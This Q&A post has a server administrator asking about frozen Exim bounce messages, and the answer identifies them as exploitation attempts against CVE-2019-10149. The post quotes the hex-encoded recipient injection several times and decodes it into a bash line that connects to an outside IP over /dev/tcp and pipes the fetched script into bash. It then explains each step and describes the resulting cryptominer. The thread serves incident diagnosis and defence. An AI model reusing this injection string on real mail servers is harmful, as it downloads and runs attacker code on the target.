# Sudden unidentified frozen emails with code injection-like recipient

Tags: security, exim, vulnerabilities

I am suddenly receiving a number of curious "Message frozen" emails from my server (Exim 4.89, Debian stable) :

> Message 1hcbPR-0005t1-2r has been frozen (delivery error message).
>
> The sender is <>.
>
> The following address(es) have yet to be delivered:
>
> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@localhost: Too many "Received" headers - suspected mail loop

```
$ sudo exim4 -Mvb 1hcbPR-0005t1-2r
1hcbPR-0005t1-2r-D
$ sudo exim4 -Mvh 1hcbPR-0005t1-2r
1hcbPR-0005t1-2r-H
Debian-exim 101 103
<>
1560715549 0
-helo_name localhost
-host_address 163.172.157.143.51642
-interface_address <MY.IP>.25
-received_protocol smtp
-body_linecount 0
-max_received_linelength 12
-frozen 1560715549
-host_lookup_failed
XX
1
root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@localhost

569P Received: from [163.172.157.143] (helo=localhost)
    by myserver.example.org with smtp (Exim 4.89)
    id 1hcbPR-0005t1-2r
    for root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@localhost; Sun, 16 Jun 2019 22:05:49 +0200
012P Received: 1
012P Received: 2
012P Received: 3
012P Received: 4
012P Received: 5
012P Received: 6
012P Received: 7
012P Received: 8
012P Received: 9
013P Received: 10
013P Received: 11
013P Received: 12
013P Received: 13
013P Received: 14
013P Received: 15
013P Received: 16
013P Received: 17
013P Received: 18
013P Received: 19
013P Received: 20
013P Received: 21
013P Received: 22
013P Received: 23
013P Received: 24
013P Received: 25
013P Received: 26
013P Received: 27
013P Received: 28
013P Received: 29
013P Received: 30
013P Received: 31
```

It [looks like code injection](http://ddecode.com/hexdecoder/?results=6fc322aa50bdcca1838eaf27aac34438) but I don't get it and it doesn't look much harmful to me :

```
root+${run{/bin/bash -c "exec 5<>/dev/tcp/51.38.133.232/80;echo -e 'GET / HTTP/1.0\n' >&5;tail -n +11 <&5 | bash" &}}@localhost: Too many "Received" headers - suspected mail loop
```

All messages are similar, with a different IP address and port.  They all come from the same address.

Is it a known infection ?

Answer (score 1, accepted):

I found the answer just before posting, figured it might be helpful for others : it does indeed correspond to attempts to exploit an Exim vulnerability, which allows for remote execution of arbitrary code.  It was announced and fixed one week ago ([CVE-2019-10149](https://www.exim.org/static/doc/security/CVE-2019-10149.txt)).

More details about this vulnerability can be found [here](https://www.openwall.com/lists/oss-security/2019/06/06/1).

### Update :

Actually the injected code is [not harmless at all](https://serverfault.com/questions/976983) :

```
exec 5<>/dev/tcp/51.38.133.232/80
```

assigns the new file descriptor 5 to a TCP connection on port 80 of 51.38.133.232.  That is, redirecting to and from file descriptor 5 will write to and read from this IP !

Then

```
echo -e 'GET / HTTP/1.0\n' >&5
```

will send an HTTP GET request to this server and

```
tail -n +11 <&5
```

will discard the HTTP headers, keeping only a malicious bash script which is finally executed by being piped through bash :

```
|bash
```

Said script is a [cryptojacking miner](https://www.lacework.com/cryptojacking-malware-creative-names/) which amongst other things deletes the root crontab and some administrative tools (e.g. `netstat`), kills running processes in order to keep all the CPU for itself, and attempts to propagate through SSH…